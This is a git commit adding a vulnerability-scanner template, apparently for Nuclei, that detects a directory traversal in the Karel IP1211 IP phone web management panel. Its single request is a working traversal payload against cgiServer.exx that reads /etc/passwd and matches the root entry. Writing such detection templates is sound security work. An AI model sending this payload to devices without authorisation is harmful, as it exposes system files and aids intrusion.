Create karel-ip-phone-lfi.yaml

patch-1
Roberto Nunes 2021-09-06 17:54:33 +09:00 committed by GitHub
parent 1f403d4ddb
commit 99d51ba4bc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

24
karel-ip-phone-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: karel-ip-phone-lfi
info:
name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
author: 0x_Akoko
severity: high
reference: https://cxsecurity.com/issue/WLB-2020100038
tags: karel,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200